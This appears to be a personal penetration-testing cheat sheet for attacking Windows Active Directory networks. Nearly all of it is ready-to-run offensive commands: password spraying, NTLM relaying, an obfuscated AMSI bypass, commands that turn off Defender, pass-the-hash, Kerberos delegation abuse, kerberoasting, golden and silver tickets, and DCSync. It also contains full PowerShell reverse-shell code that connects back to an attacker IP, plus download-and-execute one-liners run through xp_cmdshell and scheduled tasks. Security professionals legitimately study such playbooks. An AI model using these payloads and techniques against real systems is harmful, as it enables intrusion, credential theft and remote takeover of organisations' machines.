# nmap -sn 10.10.10.0/24 -oN hosts.txt
or
Nessus host discovery
or
Fping
# fping 10.10.10.10
Network scan that sends one ping packet per IP
# fping -a -r 0 -g 10.10.10.0/24
4 ping packets per IP (-r for retry)
# fping -a -r 3 -g 10.10.10.0/24
Faster network scan by by adding "-i 1" switch (Requires sudo, waits 1ms between pings)
# sudo fping -a -i 1 -r 0 -g 10.10.10.0/24
Fast scan, but from a host-list
# sudo fping -a -i 1 -r 0 < iplist.txt
- Do OSINT against the target company. LinkedIn and Google is a good place to start.
- Harvest email addresses and create different naming conventions.
- Tools: MailSniper.ps1 (https://github.com/dafthack/MailSniper), Metasploit
Internal or External domain enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com -OutFile possibledomains.txt -CompanyName "Company A"
Username enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-UsernameHarvestOWA -UserList .\userlist.txt -ExchHostname mail.domain.com -Domain domain.txt -OutFile possibleusernames.txt
With metasploit (timing attack):
msf5 > use auxiliary/scanner/http/owa_login >
Password spraying (doable with metasploit's owa_login as well):
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
EWS:
PS C:\Tools> Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
- Assuming we got valid credentials
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Pa$$w0rd -OutFile .\GAL.txt
- Tools: RDPassSpray.py (https://github.com/xFreed0m/RDPassSpray)
# python3 RDPassSpray.py -u chunk -p nocaptainchunk! -d EASY-CORE -t 10.10.10.10:<port>
# python3 RDPassSpray.py -U users.txt -P passwords.txt -d EASY-CORE -t 10.10.10.10:<port>
- Read /etc/resolv.conf from kali
- Run nmap on port 445 and 53
- https://github.com/lgandx/Responder
- add -wrt for wpad, but don't run this for very long
- f relaying, turn off http and smb in Responder.conf
- logs: /usr/share/responder/logs
# responder -I eth0
- https://github.com/fox-it/mitm6
- I usually run nmap to discover hosts with smbsigning disabled or not required
# nmap -p137,139,445 --script smb-security-mode
or using CrackMapExec:
#crackmapexec smb 10.10.10.0/24 --gen-relay-list ipstoberelayed.txt
# python mitm6.py -l domain.local -v
# ntlmrelayx.py -6 -tf ipstoberelayed.txt
https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
PS C:\tools> Out-CHM -PayloadURL http://10.10.10.10/nishang.ps1 -HHCPath "C:\tools"
or check my blog about client side attacks: https://msry1.wordpress.com/2020/07/03/having-fun-with-client-side-attacks/
Download: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec More flags: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference Password Spray:
# crackmapexec smb 10.10.10.10 -u userlists.txt -p Pa$$w0rd
Pass the hash:
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
Useful CME Flags:
- Domain Password Policy: --pass-pol
- Use local authentication: --local-auth
- Find SMB Shares: --shares
- Find Loot: --spider [Share Name] --depth [how deep, ie. 10] --pattern [ssn|password|credit] --shares | egrep -v "([-]|[+]|[*]|--|ADMIN|print|IPC|Default share|Remark)"
- Extract SAM: --sam
- Get LSA Secrets: --lsa
- Who is currently logged in: --loggedon-users
- Load a Module: -M ie. Mimikatz
- Extract NTDS: --ntds drsuapi
- Tools: PowerShdll (https://github.com/p3nt4/PowerShdll)
Checking current language mode:
PS C:\Tools> $ExecutionContext.SessionState.LanguageMode
Only works when CLM is locally setup.
PS C:\Tools> curl http://10.10.10.10/PowerShdll.dll -OutFile ps.dll
PS C:\Tools> rundll32.exe .\ps.dll, main -i
With Local Admin (GUI):
- Edit the system environment variables
- __PSLockDownPolicy set to 8
With Local Admin (CLI):
PS C:\Tools> Remove-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -name __PSLockdownPolicy
PS C:\Tools> setx _PSLockdownPolicy 0 /m
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
With ps.dll:
PS C:\Tools> curl http://10.10.10.10/amsibypass.ps1 -OutFile amsibypass.ps1
PS C:\Tools> $amsi = [IO.File]::ReadAllText(".\amsibypass.ps1")
PS C:\Tools> IEX $amsi
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
- Tools: PowerView.ps1, PowerView_dev.ps1 (PowerView 3), BloodHound, PingCastle, ADRecon.ps1
- https://github.com/sense-of-security/ADRecon
- This will generate a nice .csv files we can parse
PS C:\Tools> .\ADRecon.ps1
Enumerating Domain:
PS C:\Tools> Get-NetDomain -Domain domain.local
PS C:\Tools> Get-DomainSID
PS C:\Tools> (Get-DomainPolicy)."system access"
PS C:\Tools> Get-NetDomainController -Domain domain.local
Enumerating Trusts and Forest:
PS C:\Tools> Get-NetDomainTrust -Domain
PS C:\Tools> Get-NetForestCatalog
PS C:\Tools> Get-NetForest
PS C:\Tools> Get-NetForestDomain | Get-NetDomainTrust
Enumerating Users:
PS C:\Tools> Get-NetUser | select -ExpandProperty samaccountname | clip
PS C:\Tools> Get-UserProperty
PS C:\Tools> Find-UserField
Powerview_dev
PS C:\Tools> $Date = (Get-Date).AddYears(-1).ToFileTime()
PS C:\Tools> Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset | clip
Enumerating Group Membership of Users:
PS C:\Tools> Get-NetGroup -UserName admin | select cn | clip
Enumerating Groups:
- Use both PowerView and dev
PS C:\Tools> Get-NetGroup -Domain domain.local
PS C:\Tools> Get-NetGroup -GroupName "Domain Admins"
PS C:\Tools> Get-NetLocalGroup -ComputerName dt-dc -Recurse
PS C:\Tools> Get-NetLocalGroupMember -ComputerName DT-DC1.domain.local -GroupName "administrators"
Enumerating Group Members:
PS C:\Tools> Get-NetGroup -UserName admin
PS C:\Tools> Get-NetGroupMember -GroupName "Domain Admins"
PowerView dev:
PS C:\Tools> Get-NetGroupMember -Identity "Domain Admins" | select MemberName,MemberSID | clip
Enumerating Computers:
PS C:\Tools> Get-NetComputer
PS C:\Tools> Get-NetComputer -Ping
PS C:\Tools> Get-NetComputer -FullData
Enumerating Shares:
PS C:\Tools> Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
PowerView dev:
PS C:\Tools> Find-InterestingDomainShareFile
Enumerating OU:
PS C:\Tools> Get-NetOU
PS C:\Tools> Get-NetOU myOUname | %{Get-NetComputer -ADSPath $_}
PowerView dev:
PS C:\Tools> Get-NetOU | select distinguishedname (do this first)
PS C:\Tools> Get-DomainComputer -SearchBase "OU=Domain Controllers,DC=dt,DC=domain,DC=local" | select name
Enumerating GPO:
PS C:\Tools> Get-NetGPO
PS C:\Tools> Get-NetGPO -CompouterName dt-dc
PS C:\Tools> Get-NetGPO | select flags,cn
PS C:\Tools> Get-NetGPO -GPOname "{xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"
PS C:\Tools> (Get-NetOU testOU -FullData).gplink (Enumerate GPO applied on the testOU OU)
PowerView dev:
PS C:\Tools> Get-DomainGPO -ComputerIdentity DT-DC | select displayname,cn
Enumerating hidden GPO:
PS C:\Tools> (([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Enumerating ACL:
PS C:\Tools> Invoke-ACLScanner | select ObjectDN,ActiveDirectoryRights,IdentityReference
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "admin"}
Enumerating objects with Unconstrained Delegation:
PS C:\Tools> Get-DomainComputer -Unconstrained | select cn
Enumerating objects with Constrained Delegation:
PS C:\Tools> Get-DomainUser -TrustedToAuth | select cn,useraccountcontrol,serviceprincipalname
S C:\Tools> Get-DomainComputer -TrustedToAuth
|:. PingCastle (Version 2.8.1.0 2/23/2020 7:08:54 AM)
| #:. Get Active Directory Security at 80% in 20% of the time
# @@ > End of support: 12/31/2021
| @@@:
: .# Vincent LE TOUX ([email protected])
.: twitter: @mysmartlogon https://www.pingcastle.com
What do you want to do?
=======================
Using interactive mode.
Do not forget that there are other command line switches like --help that you can use
1-healthcheck-Score the risk of a domain
2-conso -Aggregate multiple reports into a single one
3-carto -Build a map of all interconnected domains
4-scanner -Perform specific security checks on workstations
5-advanced -Open the advanced menu
0-Exit
==============================
This is the main functionnality of PingCastle. In a matter of minutes, it produces a report which will give you an overview of your Active Directory security. This report can be generated on other domains by using the existing trust links.
Use the latest BloodHound 3 and Neo4j 4.1
PS C:\Tools> . .\SharpHound.ps1
PS C:\Tools> Invoke-BloodHound -CollectionMethod All
Hunting for Local Admin access: Tools: PowerView.ps1, Find-WMILocalAdminAccess.ps1, Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Find-LocalAdminAccess
PS C:\Tools> . .\Find-WMILocalAdminAccess.ps1
PS C:\Tools> Find-WMILocalAdminAccess
PS C:\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> Find-PSRemotingLocalAdminAccess
PowerUp:
PS C:\Tools> . .\PowerUp.ps1
PS C:\Tools> Invoke-AllChecks
If we compromised a service account, check if this account has SeImpersonatePrivilege. If so, we can use JuicyPotato ir RougePotato to escalate to SYSTEM.
Juicy Potato:
PS C:\Tools> .\JuicyPotato.exe -l 7337 -t * -p C:\reports\53.exe -c ‘{8BC3F05E-D86B-11D0-A075-00C04FB68820}'
RougePotato
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[dt-dc]: PS C:\Users\admin\Documents> $Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://192.168.50.147/nishang8080.ps1''))'
[dt-dc]: PS C:\Users\admin\Documents> Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\Users\admin\Desktop\reverse.bat
[dt-dc]: PS C:\Users\admin\Documents> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:92937945B518814341DE3F726500D4FF /run:C:\users\appadmin\desktop\reverse.bat"'
- This includes ways to defeat kerberos double-hop issue
Passing credentials (PSCREDENTIALS):
$password = ConvertTo-SecureString “Pa$$w0rd” -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential (“domain\user”, $password)
vs kerberos double hop in a nested request:
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
hostname
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
PSRemoting:
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dt-dc
Creating a session with credentials:
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credentials domain\user
or
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credentials (Get-Credential)
Nested PSRemoting (inside a PSRemoting session):
- Create a pscredential first, or do the Get-Credential technique
- Only works if our user have access to the other remote machine
[dc-computer] PS C:\Tools> $session = New-PSSession -ComputerName dt-computer1 -Credentials domain\user
[dc-computer] PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $session
- If we compromise a machine, we can enumerate its user's access to other machines via PowerView or FindLocalAdminAccess.
- Usually, we don't have the plaintext password of the compromised user so we cannot do the nested psremoting with pscredentials.
- To get away with this, we need to get a reverse shell from the victim machine.
- Check "Reverse Shell from a PSSession" or "One Liner"
- Once we get
PS C:\Tools> $sess = New-PSSession dt-computer1
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $sess
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
# evil-winrm.rb -i 10.10.10.10 -u user -H FB18AD18D520EA42025E3F676D325F23
# mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"
# Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
# psexec.py [email protected] -hashes :FB18AD18D520EA42025E3F676D325F23
# socat tcp-l:1515,fork tcp:10.10.10.10:3389
- This should show allowed directories where we can execute our own binaries
PS C:\Tools> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\Tools> Get-AppLockerPolicy -Local -Effective -Xml | Set-Content ('C:\users\public\applockerpolicy.xml')
If AppLocker were configured with default rules, this directory is whitelisted by default:
C:\Windows\System32\spool\drivers\color
- Just like bash_history in Linux
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Kerberos is all about IMPERSONATION
A word about kerberos (credits to a youtube user "twaca")
One way to think of using Kerberos is to think of going to an amusement park. When you arrive at the park, you go to the main gate. You then proceed to the main ticket booth (the authentication server in the key distribution center) and purchase an all-day pass to the park (a ticket-granting ticket). You receive a purple wristband (because purple is the color for Wednesday) that indicates that you have paid your fee for that day and you have full access to the park. The colored wristband is good for all day. While in the park, you must purchase additional tickets for the rides. You walk up to a ticket booth (ticket-granting server) and the attendant notices that you have a purple wristband. You tell her you are wanting to ride the roller coaster. She issues you a ticket (session ticket) for the roller coaster. When you get to the roller coaster, the roller coaster attendant sees your purple wristband and accepts the ticket issued to you by the ticket seller. The roller coaster attendant does not need to check with the ticket seller because that is the only place you could have obtained that ticket. At the end of the day, when the park closes, the purple wristband for Wednesday no longer authenticates you. The wristband color for Thursday is orange. You also noticed that you did all the work. None of the ticket sellers or ride operators communicated with each other. It was up to you to procure tickets and walk around and distribute them. This is exactly the model as designed by MIT for Kerberos.
- If we have access to a computer with Unconstrained Delegation, we can potentially gain access to any user that authenticates to it because it will store their TGT into the memory which can be used for impersonation.
https://www.riccardoancarani.it/exploiting-unconstrained-delegation/
https://blog.stealthbits.com/unconstrained-delegation-permissions/
Tools: Rubeus, Mimikatz
Dump the tickets (check if there's any user we can impersonate): Rubeus:
PS C:\Tools> Rubeus.exe dump
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
Injecting the ticket: Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64ticket...
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
PS C:\Tools> .\mimikatz "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi
- If we have access to any object with Constrained Delegation, this object with attribute "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION" can access a specific service. We can request any TGT for any users as long as they're not marked "Sensitive". We can inject the TGT and request more services for abuse.
Tools: Kekeo, Mimikatz, Rubeus
kekeo # tgt::ask /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /ticket:admin.kirbi
kekeo # tgs::s4u /tgt:TGT
Injecting TGT using mimikatz:
mimikatz # kerberos::ptt TGT.kirbi
Using Rubeus:
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domaian.local /altservice:cifs /ptt
PS C:\Tools> ls \\dt-dc.domaian.local\c$
or request for LDAP for DCSync
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domaian.local /altservice:ldap /ptt
mimikatz # lsadump::dcsync /user:domain\Administrator
DCSync:
mimikatz # lsadump::dcsync /user:domain\Administrator
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 13100 hashes.txt rockyou.txt
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 18200 hashes.txt rockyou.txt
- Could be used to move laterally
- Could be used to exploit misconfigured MSSQL servers Tools: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL)
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3 Enumerate the live instances:
PS C:\Tools> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
Enumerate the links:
PS C:\Tools> Get-SQLServerLink -Instance mssql.instance.local
Crawl the links:
PS C:\Tools> Get-SQLServerLinkCrawl -Instance mssql.instance.local
- If we have sysadmin access to the end of the link, we can get a reverse shell using the following:
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell iex(new-object net.webclient).downloadstring(''http://192.168.50.147/nishang8080.ps1'')"'
or
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'
Tools: Mimikatz, ProcDump
- I usually prefer using one liners that dumps all the important hashes I need
PS C:\Tools> Invoke-Mimikatz -Command '"privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
PS C:\Tools> Invoke-Mimikatz -dumpcreds
PS C:\Tools> Invoke-Mimikatz -command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe" exit
- This assumes that we compromised a domain that has a trust and we want to compromise the trusted domain
- Requires the domain trust hash or the krbtgt account hash
Method 1: Using the trust ticket
Extract the trust ticket and grab the hash of the trust domain.local → domain you want to compromise:
mimikatz# lsadump::trust /patch
Using mimikatz golden to impersonate the trust: sid: current domain's SID sids: target domain's SID + 519 rc4: trust ticket from lsadump::trust /patch (domain.local → target.domain.local)
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-519 /rc4:FB18AD18D520EA42025E3F676D325F23 /service:krbtgt /target:target.domain.local /ticket:C:\Tools\kekeo_old\target.kirbi"'
Next, ask tgs using the ticket generated above.
PS C:\Tools\kekeo_old> .\asktgs.exe .\target.kirbi CIFS/dc-dt.target.domain.local
Injecting the ticket:
PS C:\Tools> .\kirbikator.exe lsa .\CIFS/dt-dc.target.domain.local.kirbi
Check access:
PS C:\Tools> dir \\dt-dc.target.domain.local\c$
Method 2: Using krbtgt hash
Extract the krbtgt via dcsync or mimikatz
mimikatz# lsadump::lsa /patch
Same as method 1, using mimikatz golden module:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-500 /krbtgt:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080
Next, convert the ticket to base64:
PS C:\Tools> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\tools\ticket.kirbi"))
Pass the ticket using Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64...
Best reference: https://adsecurity.org/?p=2011 This attack needs the machine hash. Example: dt-dc$
Create and inject a silver ticket using mimikatz kerberos::golden. Confirm ticket using klist.
PS C:\Tools> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /target:dt-dc.domain.local /service:HOST /rc4:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
Create a scheduled task that downloads and execute nishang. (the quotes are tricky)
PS C:\Tools> schtasks /create /S dt-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "priv4" /TR "powershell.exe -c 'iex(new-object net.webclient).downloadstring(''http://10.10.10.10/9001.ps1''')'"
Run the scheduled task.
PS C:\Tools> schtasks /Run /S dt-dc.nuclear.site /TN "priv4"
Reverse shells: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 Compile with Visual Studio
For c# command line compiling
PS C:\Tools> csc -out:rev.exe Program.cs